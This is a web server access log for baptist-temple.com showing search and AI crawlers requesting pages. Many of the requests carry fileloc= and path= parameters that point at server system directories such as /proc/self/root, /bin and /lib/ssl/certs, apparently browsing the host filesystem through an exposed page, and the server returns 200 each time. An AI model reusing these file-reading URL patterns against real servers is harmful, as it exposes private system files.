2a03:2880:f800:: - - [13/Mar/2026:00:14:12 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libdebconfclient.so.0.0.0&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12282 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:12 -0400] "GET /shop/ditrichotomous/sepiment14383751036.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:12 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pamstretch-gen&path=//bin HTTP/1.1" 200 13719 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:12 -0400] "GET /shop/staining/weltanschauung132403471713.html HTTP/1.1" 200 216872 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:12 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/display-im6&path=//kunden/usr/bin HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:13 -0400] "GET /shop/restorator/uncharitable101607981812.html?path=/homepages/25/d507814345 HTTP/1.1" 200 32907 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:13 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ppmtopcx&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:13 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/ipmi HTTP/1.1" 200 13932 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:14 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/proc/mtrr&path=//kunden/proc HTTP/1.1" 200 12587 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:14 -0400] "GET /shop/relented/simplification131294233701.html HTTP/1.1" 200 211619 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:14 -0400] "GET /shop/fallible/lookover162641977811.html?path=//var/lib/aptitude HTTP/1.1" 200 12685 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:15 -0400] "GET /shop/ruinously/nightjar111762915451.html HTTP/1.1" 200 201985 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:15 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/lesspipe&path=//bin HTTP/1.1" 200 22252 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:15 -0400] "GET /shop/docketing/decaphyllous142217860649.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:15 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ppmquantall&path=//bin HTTP/1.1" 200 14311 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:16 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/mysqlcheck&path=//kunden/usr/bin HTTP/1.1" 200 12285 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:16 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/perl&path=//kunden/usr/bin HTTP/1.1" 200 12279 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:17 -0400] "GET /shop/uroceridae/patrist13774688815.html HTTP/1.1" 200 216335 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:17 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0/rdoc/rd HTTP/1.1" 200 17583 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0/rdoc" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:17 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/nice&path=//kunden/usr/bin HTTP/1.1" 200 12279 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:18 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/pinentry&path=//kunden/usr/bin HTTP/1.1" 200 12283 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:18 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/mariadb_config&path=//kunden/usr/bin HTTP/1.1" 200 12289 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:18 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ttree&path=//bin HTTP/1.1" 200 53123 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:18 -0400] "GET /shop/douanier/onomatopoetic142068149267.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:19 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ipcrm&path=//bin HTTP/1.1" 200 12185 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:19 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/rlksh&path=//bin HTTP/1.1" 200 12185 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:20 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/usr/lib/ruby/2.7.0/digest HTTP/1.1" 200 14491 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/usr/lib/ruby/2.7.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:20 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/git-core/git-env--helper&path=//kunden/lib/git-core HTTP/1.1" 200 12305 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:20 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/cpack&path=//bin HTTP/1.1" 200 12185 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:21 -0400] "GET /shop/unthink/penock141599939102.html HTTP/1.1" 200 230807 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:21 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/ppmtobmp&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:21 -0400] "GET /shop/evasion/lantanium133375219921.html HTTP/1.1" 200 224681 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:21 -0400] "GET /shop/hailshot/lorentzii134005999427.html HTTP/1.1" 200 215492 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:21 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/librtmp.so.1&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12269 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:22 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/dpkg-divert&path=//kunden/usr/bin HTTP/1.1" 200 12286 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:22 -0400] "GET /shop/doubledyed/rifacimento143661074450.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:22 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/st4topgm&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:23 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/gnupg HTTP/1.1" 200 19838 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:23 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0/digest HTTP/1.1" 200 14414 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:24 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/python3.9/datetime.py&path=//kunden/lib/python3.9 HTTP/1.1" 200 105716 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:24 -0400] "GET /shop/vocalized/albiness133614960340.html HTTP/1.1" 200 218474 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:24 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/git-core/git-submodule&path=//lib/git-core HTTP/1.1" 200 36108 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:24 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/python3.9/lib2to3/fixes HTTP/1.1" 200 93730 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:25 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/showtable&path=//kunden/usr/bin HTTP/1.1" 200 44800 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:25 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/yuvtoppm&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:25 -0400] "GET /shop/downhearted/symplectic143933731783.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:26 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pnmpaste&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:26 -0400] "GET /shop/undecagon/thermotaxic113032938323.html HTTP/1.1" 200 219016 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:26 -0400] "GET /shop/peileag/aurated134089186687.html HTTP/1.1" 200 215873 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:26 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/usr/lib/locale/zh_CN.gbk/LC_MESSAGES HTTP/1.1" 200 14597 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/usr/lib/locale/zh_CN.gbk" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:26 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/ncftp3&path=//kunden/usr/bin HTTP/1.1" 200 12281 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:27 -0400] "GET /shop/coacher/mayors102099113446.html?path=/homepages/42/d414105715/htdocs/demo/10-5-19-deacon-meeting HTTP/1.1" 200 16068 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:27 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/racc2y2.7&path=//bin HTTP/1.1" 200 12832 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:28 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/dash&path=//bin HTTP/1.1" 200 12184 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:28 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/pnmnorm&path=//bin HTTP/1.1" 200 12187 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:29 -0400] "GET /shop/dramaturgist/orderless142625229062.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:29 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/perl/5.32/attributes.pm&path=//lib/x86_64-linux-gnu/perl/5.32 HTTP/1.1" 200 29709 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:29 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/scsi/sg HTTP/1.1" 200 22618 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/scsi" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:30 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/git-core/mergetools/vimdiff&path=//lib/git-core/mergetools HTTP/1.1" 200 13574 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:30 -0400] "GET /shop/ventriloquized/assastion134110756803.html HTTP/1.1" 200 244717 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:30 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/zipcloak&path=//kunden/usr/bin HTTP/1.1" 200 12283 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:31 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/getopt&path=//bin HTTP/1.1" 200 12186 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
40.77.167.0 - - [13/Mar/2026:00:14:31 -0400] "GET /shop/chalon/matin121516087236.html HTTP/1.1" 200 225992 www.baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:31 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libsqlite3.so.0.8.6&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12276 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
40.77.167.0 - - [13/Mar/2026:00:14:32 -0400] "GET /shop/examinant/lenard163650972910.html HTTP/1.1" 200 212598 baptist-temple.com "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:32 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/x86_64-linux-gnu/libavahi-client.so.3.2.9&path=//lib/x86_64-linux-gnu HTTP/1.1" 200 12281 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:32 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/proc/1568132/maps&path=//kunden/proc/1568132 HTTP/1.1" 200 12295 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:32 -0400] "GET /shop/overstep/toreumatology13778856464.html HTTP/1.1" 200 220949 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a02:598:: - - [13/Mar/2026:00:14:32 -0400] "GET /shop/shoving/sediment171468287802.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)" "-"
2a02:598:: - - [13/Mar/2026:00:14:32 -0400] "GET /shop/besought/courthouse1337353408.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (compatible; SeznamBot/4.0; +https://o-seznam.cz/napoveda/vyhledavani/en/seznambot-crawler/)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:32 -0400] "GET /shop/fallible/lookover162641977811.html?path=//lib/x86_64-linux-gnu/perl/5.32/linux HTTP/1.1" 200 17409 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:32 -0400] "GET /shop/dwarf/inextricableness142100342149.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:33 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0/rdoc/i18n HTTP/1.1" 200 16018 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/self/root/lib/ruby/2.7.0/rdoc" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:33 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/lib/git-core/git-cherry&path=//kunden/lib/git-core HTTP/1.1" 200 12300 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:34 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/6fa5da56.0&path=//lib/ssl/certs HTTP/1.1" 200 14370 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:34 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/fc-match&path=//kunden/usr/bin HTTP/1.1" 200 12283 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
45.117.62.0 - - [13/Mar/2026:00:14:34 -0400] "GET /shop/obdiplostemonous/hydraulical722423467041.html HTTP/1.1" 200 54919 www.baptist-temple.com "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:34 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/isutf8&path=//kunden/usr/bin HTTP/1.1" 200 12281 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:35 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/fc-cache&path=//kunden/usr/bin HTTP/1.1" 200 12283 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:36 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//kunden/usr/bin/pnmrotate&path=//kunden/usr/bin HTTP/1.1" 200 12284 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
74.7.242.0 - - [13/Mar/2026:00:14:36 -0400] "GET /shop/lachrymals/pestilential142250080589.html?path=//proc/tty/ldisc HTTP/1.1" 200 12683 baptist-temple.com "https://baptist-temple.com/shop/lachrymals/pestilential142250080589.html?path=//proc/tty" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "-"
66.249.70.0 - - [13/Mar/2026:00:14:36 -0400] "GET /shop/unmiter/tubful132020410261.html HTTP/1.1" 200 230021 baptist-temple.com "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.7632.116 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:36 -0400] "GET /shop/fallible/lookover162641977811.html?path=//kunden/lib/compat-ld HTTP/1.1" 200 14124 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
144.76.32.0 - - [13/Mar/2026:00:14:36 -0400] "GET /shop/dynamometric/priestism142117697203.html HTTP/1.1" 200 54919 baptist-temple.com "-" "Mozilla/5.0 (compatible; SERankingBacklinksBot/1.0; +https://seranking.com/backlinks-crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:36 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/wrjpgcom&path=//bin HTTP/1.1" 200 12188 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:37 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/python3.9/json/encoder.py&path=//lib/python3.9/json HTTP/1.1" 200 28790 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:37 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/aptitude-create-state-bundle&path=//bin HTTP/1.1" 200 14434 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:38 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/manpath&path=//bin HTTP/1.1" 200 12187 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:39 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//bin/tail&path=//bin HTTP/1.1" 200 12184 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
2a03:2880:f800:: - - [13/Mar/2026:00:14:39 -0400] "GET /shop/fallible/lookover162641977811.html?fileloc=//lib/ssl/certs/2b349938.0&path=//lib/ssl/certs HTTP/1.1" 200 13480 baptist-temple.com "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)" "-"
